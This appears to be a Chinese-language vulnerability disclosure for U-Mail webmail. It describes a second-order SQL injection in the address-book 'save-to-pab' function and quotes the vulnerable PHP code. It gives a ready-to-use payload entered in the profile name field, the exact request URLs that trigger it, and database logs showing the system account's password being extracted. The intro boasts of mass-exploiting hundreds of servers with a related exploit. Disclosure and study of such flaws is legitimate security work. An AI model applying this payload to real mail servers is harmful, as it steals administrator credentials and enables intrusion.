### 简要描述:
U-Mail别哭。另外wooyun-2010-093049更新了无需登录且可批量getshell的exp,随便测试了下,批量轻轻松松get几百个shell,很严重,望管理速审核 :)
### 详细说明:
漏洞文件
/client/oabshare/module/operates.php 代码
```
if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = gss( $_GET['maillist'] );
$maillist_id = intval( $maillist_id );
if ( $maillist_id )
{
......
}
else
{
$domain_id = gss( $_GET['domain_id'] );
$user_ids = gss( $_GET['userlist'] );
$user_ids = id_list_filter( $user_ids );//WooYun-2014-74928
if ( !$user_ids )
{
dump_msg( "param_error", "参数错误!" );
}
$where = "t1.UserID IN (".$user_ids.")";
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//首先是从数据库获取数据
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $user_all as $user )
{
$qq = $msn = "";
if ( strpos( $user['qqmsn'], "@" ) )
{
$msn = $user['qqmsn'];
}
else
{
$qq = $user['qqmsn'];
}
if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $user['FullName'],//从数据库读取的字段内容
"pref_email" => $user['email'],
"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
"birthday" => $user['birthday'],
"im_qq" => $qq,
"im_msn" => $msn,
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );//直接将读取的内容执行了add的操作
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
dump_json( array( "status" => TRUE, "message" => "" ) );
}
```
首先,需要引入二次注入的exp,引入文件如下
/client/option/module/o_userinfo.php
```
if ( ACTION == "userinfo" )
{
$url = make_link( "option", "view", "userinfo" );
$where = "UserID='".$user_id."'";
$data = array(
"FullName" => gss( $_POST['fullname'] ),//获得的数据存入数据库
"EnglishName" => gss( $_POST['englishname'] )
);
$result = $Mailbox->update_mailbox( $data, $where, 0 );
if ( !$result )
{
redirect( $url, "修改姓名时出现错误,修改失败!" );
}
```
将单引号等信息存入数据库,查看表结构,如下
[<img src="https://images.seebug.org/upload/201501/2216050334aefa1f4bce6a72ac91fbf155141a08.png" alt="a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2216050334aefa1f4bce6a72ac91fbf155141a08.png)
长度为100足够读取敏感数据了首先登录用户,在修改个人资料处,中文名处填写
',`homepage`=(SELECT password from userlist where userid=2)#如图
[<img src="https://images.seebug.org/upload/201501/221605335dac43dd0939df3a6b4afcf9b7b694ac.png" alt="b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221605335dac43dd0939df3a6b4afcf9b7b694ac.png)
保存后,查看自己用户的userid,请求为
http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test0006
如图
[<img src="https://images.seebug.org/upload/201501/2216060646e21096629f9f3c0ef760121f0b5964.png" alt="c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2216060646e21096629f9f3c0ef760121f0b5964.png)
然后执行如下请求http://mail.fuck.com/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&domain_id=1&userlist=9
userlist为自己的userid,domain_id默认都为1执行完毕后,点击个人通讯录,如图
[<img src="https://images.seebug.org/upload/201501/22160642131c53001b92005624ad28bff7bb094d.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22160642131c53001b92005624ad28bff7bb094d.png)
空白处,system帐号的密码如图
[<img src="https://images.seebug.org/upload/201501/22160718890932b6419ef64c5427f166f2ffb618.png" alt="e.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22160718890932b6419ef64c5427f166f2ffb618.png)
[<img src="https://images.seebug.org/upload/201501/221607252c350ed1dba292c2552c8b4c84146c01.png" alt="f.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221607252c350ed1dba292c2552c8b4c84146c01.png)
两步的sql执行情况如下
```
150122 15:54:44 2665 Connect umail@localhost on
2665 Query SET NAMES 'UTF8'
2665 Init DB umail
2665 Query UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='9'
2665 Query UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='9'
2665 Quit
```
以及
```
150122 15:57:16 2668 Connect umail@localhost on
2668 Query SET NAMES 'UTF8'
2668 Init DB umail
2668 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2668 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2668 Query SELECT contact_id FROM pab_contact WHERE user_id='9' AND pref_email='test0005@fuck.com' LIMIT 1
2668 Query INSERT INTO pab_contact SET `user_id`='9',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test0005@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-22 15:57:16'
2668 Quit
```
### 漏洞证明:
如上
京公网安备 11010502034610号
暂无评论